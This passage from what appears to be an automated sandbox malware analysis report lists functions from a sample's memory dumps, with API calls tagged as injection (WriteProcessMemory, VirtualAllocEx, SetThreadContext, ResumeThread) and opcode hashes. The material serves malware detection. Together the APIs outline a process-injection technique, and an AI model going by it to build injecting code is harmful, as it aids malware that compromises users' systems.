Instruction Fuzzy Hash: 16312C786403889FE708AF60F84876A3BA1F7D5710F11852AE9258B3E5DFBD5C56CB20

Function 085B66D0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 085B6768

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 27830c6dc8128161797caabc14331e8993f1fe486a4dadf6411547be4d060078
Instruction ID: f8db45ef4f684949566b5a9f01a509c8351fb1c0821c0864cf48df4d03372a94
Opcode Fuzzy Hash: 27830c6dc8128161797caabc14331e8993f1fe486a4dadf6411547be4d060078
Instruction Fuzzy Hash: 09215AB1900349DFDB10CFAAC885BDEBBF5FF48310F10842AE918A7240C7799944CBA1

Function 085B66D8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 085B6768

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cb3cf0ca141ccbf9ce56e748f3c36c989928557b5f82b3cedca8de1c95c53fac
Instruction ID: f40583f79b6c22b5f52552f63a574dc5a851dc8e19a6897fca963228a666673f
Opcode Fuzzy Hash: cb3cf0ca141ccbf9ce56e748f3c36c989928557b5f82b3cedca8de1c95c53fac
Instruction Fuzzy Hash: 712139B5900349DFDB10CFAAC985BDEBBF5FF48310F14842AE918A7240C7799955CBA1

Function 085B6538 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 085B65BE

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9121247260a43c9b5fdbeaa30b69cf06c29bdd08d2c5220e18edff8bd396600f
Instruction ID: 822fd2c18f7addb81bbb9e9974259fcf28086e57928de4ff5d4cb675901816d1
Opcode Fuzzy Hash: 9121247260a43c9b5fdbeaa30b69cf06c29bdd08d2c5220e18edff8bd396600f
Instruction Fuzzy Hash: DF215971D003489FDB10CFAAC485BEEBBF4EF48210F54842ED459A7240CB79A545CFA5

Function 085B67C1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 085B6848

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3bae01d2df5f3f7519b876e8d8775960c445d808036f5bd3fa51669dae455359
Instruction ID: 0b9c5ce7cf4f3570fe809c678e1cd110ce37047eff6ef7c2a201733dadfadb16
Opcode Fuzzy Hash: 3bae01d2df5f3f7519b876e8d8775960c445d808036f5bd3fa51669dae455359
Instruction Fuzzy Hash: 212116B1D003499FDB10DFAAC884BEEBBF5FF48310F54842AE919A7240D7799901CBA1

Function 0298B730 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0298D5E6,?,?,?,?,?), ref: 0298D6A7

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2370adebe9ba58f6e56537e61886cd514cc1ad37096dddfc14d442c6e95594be
Instruction ID: c0b40b9d4661999a7e7ba2021c8a559c6625865df9be8943b10e620f377f7a4f
Opcode Fuzzy Hash: 2370adebe9ba58f6e56537e61886cd514cc1ad37096dddfc14d442c6e95594be
Instruction Fuzzy Hash: 3721E7B5900248DFDB10DFAAD484ADEBBF4EB48310F14845AE918A7350D374A944CF65

Function 0298D619 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0298D5E6,?,?,?,?,?), ref: 0298D6A7

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7cf28dd4d8755ac0995d75fa8764cdbf5cdb1ab994c03c907df2eac9701b40af
Instruction ID: f3160bd300e851ec1b8fb63e0a00af3bf8fde35fc3d4aa8b786fdeb9798c6109
Opcode Fuzzy Hash: 7cf28dd4d8755ac0995d75fa8764cdbf5cdb1ab994c03c907df2eac9701b40af
Instruction Fuzzy Hash: D321E4B5900248DFDB10CFAAD484ADEBBF8FB48314F14801AE918A7350C378A945CF65

Function 085B6540 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 085B65BE

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 751274745731c7c632136973fd7e0147b62bdbed923866218ac456902c3b21ee
Instruction ID: f61c84c4c94d2816d26816e417639a2f075e2f759181c5a3b2fd30c718a1d85f
Opcode Fuzzy Hash: 751274745731c7c632136973fd7e0147b62bdbed923866218ac456902c3b21ee
Instruction Fuzzy Hash: 722135719003098FDB10CFAAC485BEEBBF4FF48214F54842AD419A7280CB78A945CFA1

Function 085B67C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 085B6848

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cb015bfe4955ef9a1ab830720930967b33fa703b011a00472356c22c9cb40552
Instruction ID: 360e971e352c1eab9ae594aa300e49a7b5d94da6c057e8ebfaf764339d961629
Opcode Fuzzy Hash: cb015bfe4955ef9a1ab830720930967b33fa703b011a00472356c22c9cb40552
Instruction Fuzzy Hash: 5E2114718003499FDB10CFAAC884BEEBBF5FF48310F54842AE918A7240D779A901CBA1

Function 085B6610 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 085B6686

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 03cb65ab54feb8c02e48cb67fcc07e00ca36150dc97f9204cfd5e1ac650cb69a
Instruction ID: 05e57ef43220d4e12e1652c84d16f28cd3954077366334e52e5d5799796133ca
Opcode Fuzzy Hash: 03cb65ab54feb8c02e48cb67fcc07e00ca36150dc97f9204cfd5e1ac650cb69a
Instruction Fuzzy Hash: CE1114729003499FDB24DFAAD845BDFBBF5AB48310F14841AE919A7250C776A940CBA1

Function 085B6618 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 085B6686

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eaa7e17109888792d9fd467a927e94eabd63dadcb3e946d5f94cde36ba47619b
Instruction ID: dd78572c9490202b2cf899f9eb1b52017e802a2ef494731bc860ddebd35169ed
Opcode Fuzzy Hash: eaa7e17109888792d9fd467a927e94eabd63dadcb3e946d5f94cde36ba47619b
Instruction Fuzzy Hash: C0112672900349DFDB10DFAAC844BDFBBF5EB48310F14841AE519A7250C776A940CBA1

Function 085B6056 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 085B60BA

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 11202e98a99243a9003a23d697c0afdb011ff171530bd7855089b1925b0fdeb1
Instruction ID: 9b1c0dca9e2540fb391b52e14d13374a29d3879ef3c027825b5781f9710aa8e7
Opcode Fuzzy Hash: 11202e98a99243a9003a23d697c0afdb011ff171530bd7855089b1925b0fdeb1
Instruction Fuzzy Hash: ED113671D00348CFDB24DFAAC4457DFFBF4EB88224F24841AD519A7240CB7AA944CBA5

Function 085B6058 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 085B60BA

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 76c4d2a062369359c48d617f2cf4c5d157342517156d376c174f238c94698fbb
Instruction ID: 1cb18f32982ebe2ed685208062049eb711bcb83a3afc16d0a881f1f8dc775cb6
Opcode Fuzzy Hash: 76c4d2a062369359c48d617f2cf4c5d157342517156d376c174f238c94698fbb
Instruction Fuzzy Hash: 86113671D00348CFDB20DFAAC4457DFFBF4EB88224F24841AD519A7240CB79A944CBA5

Function 085B9598 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 085B95FD

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 06833038b08b1525a7facf5e0a310a6e3896443c3d6d4601c170e24dc60ffaf3
Instruction ID: de1c28c2a71e61ebc0cc047e6c28ce364eac3ebaff5463d6a0f8503a9892069e
Opcode Fuzzy Hash: 06833038b08b1525a7facf5e0a310a6e3896443c3d6d4601c170e24dc60ffaf3
Instruction Fuzzy Hash: 0911E0B5800649DFDB20DF9AD885BDEFBF8FB48320F208459E958A7240C375A944CFA5

Function 085B4A28 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 085B95FD

Memory Dump Source

Source File: 00000008.00000002.1475818318.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_85b0000_qggKEJlcsFa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d07de41a7bd90d5ce8cbd54bed1f8b8c05af4790845e99cadeab803889c5ccc8
Instruction ID: 901c3ba04b492c1099b4d4607b69cec48dc9c5d13da120635dc07467ce439a94
Opcode Fuzzy Hash: d07de41a7bd90d5ce8cbd54bed1f8b8c05af4790845e99cadeab803889c5ccc8
Instruction Fuzzy Hash: 9B11F5B5800748DFDB10DF9AD884BDEBBF8FB48320F108459E918A7240D375A944CFA5

Function 0298AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0298AF9E

Memory Dump Source

Source File: 00000008.00000002.1471998872.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2980000_qggKEJlcsFa.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6122bb7445737365260ef2dfcb115ff89098f633316f5a1f5a3d81358edd38aa
Instruction ID: 4d25271d687893fce329cf6778e4457b5818e8fb7fa53c2278352eb75d8e52e3
Opcode Fuzzy Hash: 6122bb7445737365260ef2dfcb115ff89098f633316f5a1f5a3d81358edd38aa
Instruction Fuzzy Hash: 3C11D2B6D006498FDB10DF9AD544ADEFBF4EF88214F14846AD819A7210C379A545CFA1

Function 06D44568 Relevance: .7, Instructions: 686COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe213e1a78438d8ad0ac91bda39eda68d6ac69ea5a9bbf137a74771eacf956ee
Instruction ID: 7ac0f7cafaf6c5e08253ddfd29c069af3ca938f460ed09a25aba9184a2ecc241
Opcode Fuzzy Hash: fe213e1a78438d8ad0ac91bda39eda68d6ac69ea5a9bbf137a74771eacf956ee
Instruction Fuzzy Hash: 0B52E234A002188FEB65DBE4C864BAEBBB2EF84301F5081A9D10A7B3A5DF355D85DF51

Function 06D45170 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c12d258414999db454ef8a46acc8e0a1d15d47f8061f619a77a8924e4d58414
Instruction ID: 8d2fd185017049797167cbbd6b09e81b88261c61e48a10679d5b7a046304e0a3
Opcode Fuzzy Hash: 5c12d258414999db454ef8a46acc8e0a1d15d47f8061f619a77a8924e4d58414
Instruction Fuzzy Hash: A8F17F30B10201CFEBA9AF79E85873D7BE6AF84611F1944AAE546CF3A1DE25CC41C791

Function 06D43BE0 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb81a83722b89fe29b216ac2196235c71b2baaf2325e75f8711271d25016841
Instruction ID: 4dce1f1714c993a44d9a0b5ee9d49ea59fda84dd9127bd92ddb9762443dec7fb
Opcode Fuzzy Hash: 1fb81a83722b89fe29b216ac2196235c71b2baaf2325e75f8711271d25016841
Instruction Fuzzy Hash: FA126A30A00208DFDB54EFA9D984A9EBBF2FF88314F158569E459EB261DB31ED41CB50

Function 06D47BF8 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c0bd8091a266edf5407d3669cf5c349285128cccdfd96f3c3aaca089a821b0
Instruction ID: 97fdaf3edfa900d5452ed7e315a170272e51bcfca53afe25c704978d3a3f05c7
Opcode Fuzzy Hash: f4c0bd8091a266edf5407d3669cf5c349285128cccdfd96f3c3aaca089a821b0
Instruction Fuzzy Hash: 61F11975A01215CFCB54DFA8D584AADBBF6FF88310F1A85A9E416AB361CB31EC41CB50

Function 06D45AF0 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b976b52e790847ade787891a114640bd5425a261457def23e2e37d3dcd432d0
Instruction ID: 9eb5eaf4f2cafb47fa82d633482cee32aa234c327881d36af1df881e1ea89efb
Opcode Fuzzy Hash: 9b976b52e790847ade787891a114640bd5425a261457def23e2e37d3dcd432d0
Instruction Fuzzy Hash: 32C1F231A007058FC754EF68E884A6ABBF6FF85320F55856AE858DB391D731EC11CBA1

Function 06D42410 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d00de466f296b9da584ccf0ceea67eb11153e649476b3621242c5ead30ab4be1
Instruction ID: 2ec2aeb90e271f96c3ba5535fb592aa777dd61d4febe7ed7833dae07458c9862
Opcode Fuzzy Hash: d00de466f296b9da584ccf0ceea67eb11153e649476b3621242c5ead30ab4be1
Instruction Fuzzy Hash: 2AB1C034B042149FEB55AF74D8A8B2A7BE6AF88350F148869F846CB391DF75CD41CB90

Function 06D43BD0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b076a0d6e0822935e4e231869c06e2306cec828be8a2994738afd7d1954939
Instruction ID: 001b987b1153ef9aec246ce14ba03025036a29036ccb0691a0064fac0e0683e4
Opcode Fuzzy Hash: 79b076a0d6e0822935e4e231869c06e2306cec828be8a2994738afd7d1954939
Instruction Fuzzy Hash: 7CC16D30A002499FDB54EFAAD984A9EBBF2FF88314F158559E419EB261D731EC41CF50

Function 06D42970 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ee84e48ef2f8afd74f3d855119545af3140bf949bfd90a2810414348da0eee
Instruction ID: d1e29b809d61e30edf30807921ad9c8812b04fcc38020bb05995dd05e5a6a4ff
Opcode Fuzzy Hash: 40ee84e48ef2f8afd74f3d855119545af3140bf949bfd90a2810414348da0eee
Instruction Fuzzy Hash: 1C817234E00505CFDB98EFA9C884A6AB7F1FF88314B158569E816E7369DB31DE41CB90

Function 06D45EB0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961babf212fb49e0dda4d8e7af9bd23c5e0c10bb1c2ad2488afd1610734c0cee
Instruction ID: 727e22d3d91c44546ca8e4055895ea7c65c66a6b8cb63ddae8d950369af8a064
Opcode Fuzzy Hash: 961babf212fb49e0dda4d8e7af9bd23c5e0c10bb1c2ad2488afd1610734c0cee
Instruction Fuzzy Hash: 7E61C470B042468FDB94EB79D8907BEB7F6EF85300F148469E552DB381DA39DC8187A1

Function 06D46D18 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59fa39bac607299d8cebd13480682a926089a2af2396edb4ddacb51bf42242cc
Instruction ID: 1d265574258bcfeb9c8a6b36d13d7ef044bacc46f266e970f14dc805410b9b94
Opcode Fuzzy Hash: 59fa39bac607299d8cebd13480682a926089a2af2396edb4ddacb51bf42242cc
Instruction Fuzzy Hash: 8661A0307041918FDB94EF79DC84A6A7BE5EF8A65071984BAE457CB261EB31DC01CBA0

Function 06D441B0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6265043e3270222e9a82eb3ab548e73aabd76d5f3300f96b42a5c8678bad6d19
Instruction ID: 11a5d5e7d9b87d60c6ac19d8325fede5dd52d00f95ea39420ba1adf540689309
Opcode Fuzzy Hash: 6265043e3270222e9a82eb3ab548e73aabd76d5f3300f96b42a5c8678bad6d19
Instruction Fuzzy Hash: 55711434B502458FDBA5EF68C898B6A7BF5EF49610F1940A9E846CB361DB70DC81CB90

Function 06D4C63F Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa8e3ea3a3100243449d696647321c1efecd5f08bc57aeae1cd72898deb04b0
Instruction ID: e2ac27208342172f4eb43bc43d9ce890f9079587eb158972b384450e804a524f
Opcode Fuzzy Hash: 5fa8e3ea3a3100243449d696647321c1efecd5f08bc57aeae1cd72898deb04b0
Instruction Fuzzy Hash: 6651F630E152499FEB58EBA9D8507BEBBB2BF84300F108126E595B7780DB349D02CB91

Function 06D471B0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86721b676f603d89a6bf4c9149529f6b02453eb6442ccfea7abe55e0563cd14a
Instruction ID: 793a912f95161fba64ab41f34b98e7e4d837d67c541bff7ffb60f7a3673616b8
Opcode Fuzzy Hash: 86721b676f603d89a6bf4c9149529f6b02453eb6442ccfea7abe55e0563cd14a
Instruction Fuzzy Hash: DA617A70E003498FDF66DFA5C544BAEBBF2AF8A304F248659E855BB241D770AD81CB40

Function 06D48D74 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880896ded54dfd1c03256d0ce0e53df1cb1320d5ea7ad58e24ac08654b982ed6
Instruction ID: 6637689e43c1416b797a24a7200cee4cb79a21df66ae4eab520648a321ca0204
Opcode Fuzzy Hash: 880896ded54dfd1c03256d0ce0e53df1cb1320d5ea7ad58e24ac08654b982ed6
Instruction Fuzzy Hash: EA51A071B006058FDB14EFB99888AAEBBF7EFC5220B148529E419D7391EF709C068790

Function 06D486A0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b31d724c316c2ac8fe7fa70bae6bc019a269962d6da7043fa6e84e35e84503
Instruction ID: 70d137e9f849274d2d7b4a9b96b84ceb0d42e1d5c9fdb0d3702d1787a4b57b37
Opcode Fuzzy Hash: 55b31d724c316c2ac8fe7fa70bae6bc019a269962d6da7043fa6e84e35e84503
Instruction Fuzzy Hash: DB519E35B003089BD704BFB8E4456ADBBB2BB88700F5584A9D9526F386CF30AE49D791

Function 06D486B0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e0f97847d0e449b78497c758c5e6be6a50f70abee2069a5bc1f3f484c34e91
Instruction ID: db47cd2d81b481be86ab698709e0d537b3ab8396a3c7563ae32ba0daaabfcd1c
Opcode Fuzzy Hash: f5e0f97847d0e449b78497c758c5e6be6a50f70abee2069a5bc1f3f484c34e91
Instruction Fuzzy Hash: A1519135B003089BD704BFB8E4456ADBBB2BBC9700F5584A9E9526F385CF31AE49C791

Function 06D471A0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7e6dd3c7136d82f3a03df32cf76fbb3e312e46c737ee6c037be26338d777d7
Instruction ID: 5f595276c8d1b587fb0cbd513de6da6fdaf56e4d5539a6ad688da5ec1e053719
Opcode Fuzzy Hash: bb7e6dd3c7136d82f3a03df32cf76fbb3e312e46c737ee6c037be26338d777d7
Instruction Fuzzy Hash: 47517A70E00789DFDF26CFA5C5446EDBBF2AF89300F248659E855AB241D770AD81CB40

Function 06D478D8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776f6ffa93f9dfcad056b12ab081368c710a6caceff3ccea9e116ece616741de
Instruction ID: a715e75104902d06f9ea89c496c45840405fda2fb6d028b21d0811dec37391f2
Opcode Fuzzy Hash: 776f6ffa93f9dfcad056b12ab081368c710a6caceff3ccea9e116ece616741de
Instruction Fuzzy Hash: 0D41AE35B102049FDB18ABA8D895BAE7BF6AFC8711F144469E51ADB390CF35DC41CB90

Function 06D46383 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6d40000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f09fa18c5eb24591898ab1fb9c97f3f88f50dc0aab68962bf5b116b8ff7dcc
Instruction ID: e23e1ccb047ea394856791371c4a6005aaf7d4cc1286b1cf85c57bc517d82f41
Opcode Fuzzy Hash: d7f09fa18c5eb24591898ab1fb9c97f3f88f50dc0aab68962bf5b116b8ff7dcc
Instruction Fuzzy Hash: 4E41BE71A04299DFDF51DFA4C844BADBFB2EF4A350F048456E806AB295D331ED54CBA0

Function 06D48CF4 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1475000491.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false

Joe Sandbox IDA Plugin

